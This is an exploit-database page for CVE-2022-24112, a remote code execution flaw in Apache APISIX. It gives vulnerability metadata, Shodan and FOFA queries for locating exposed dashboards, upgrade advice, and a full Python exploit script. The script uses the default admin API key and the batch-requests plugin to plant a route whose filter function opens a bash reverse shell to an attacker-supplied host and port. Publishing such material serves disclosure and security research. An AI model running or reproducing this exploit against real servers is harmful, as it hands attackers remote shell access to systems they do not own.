header-logo
Suggest Exploit
vendor:
APISIX
by:
Ven3xy
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: APISIX
Affected Version From: 1.3
Affected Version To: 2.12.2001
Patch Exists: YES
Related CWE: CVE-2022-24112
CPE: a:apache:apisix
Metasploit:
Other Scripts:
Tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.openwall.com/lists/oss-security/2022/02/11/3https://twitter.com/sirifu4k1/status/1496043663704858625https://apisix.apache.org/zh/docs/apisix/plugins/batch-requestshttps://nvd.nist.gov/vuln/detail/CVE-2022-24112http://www.openwall.com/lists/oss-security/2022/02/11/3
Nuclei Metadata: {'max-request': 2, 'fofa-query': 'title="Apache APISIX Dashboard"', 'product': 'apisix', 'shodan-query': 'title:"Apache APISIX Dashboard"', 'vendor': 'apache'}
Platforms Tested: CentOS 7
2022

Apache APISIX 2.12.1 – Remote Code Execution (RCE)

A vulnerability in Apache APISIX versions 1.3 - 2.12.1 allows an attacker to execute arbitrary code on the target system. This is due to the lack of proper input validation when handling user-supplied data. An attacker can exploit this vulnerability by sending a maliciously crafted request to the target system.

Mitigation:

Upgrade to Apache APISIX version 2.12.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112


import requests
import sys

class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]    
    

def banner():
    run = color_random[6]+'''\n                                   .     , 
        _.._ * __*\./ ___  _ \./._ | _ *-+-
       (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
          |                     |          
\n'''
    run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''           
    run3 = color_random[4]+'''{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }\n\n'''
    print(run+run2+run3)    

if (len(sys.argv) != 4):
    banner()
    print("[!] Usage   : ./apisix-exploit.py <target_url> <lhost> <lport>")
    exit()
    
else:
    banner()
    target_url = sys.argv[1]  
    lhost = sys.argv[2]
    lport = sys.argv[3]
    
headers1 = {
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Content-Length': '540',
    'Connection': 'close',
}

headers2 = {
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',
}

json_data = {
    'headers': {
        'X-Real-IP': '127.0.0.1',
        'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
        'Content-Type': 'application/json',
    },
    'timeout': 1500,
    'pipeline': [
        {
            'path': '/apisix/admin/routes/index',
            'method': 'PUT',
            'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
        },
    ],
}

response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)

response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)

Navigation

Suggest Exploit

Services By CQR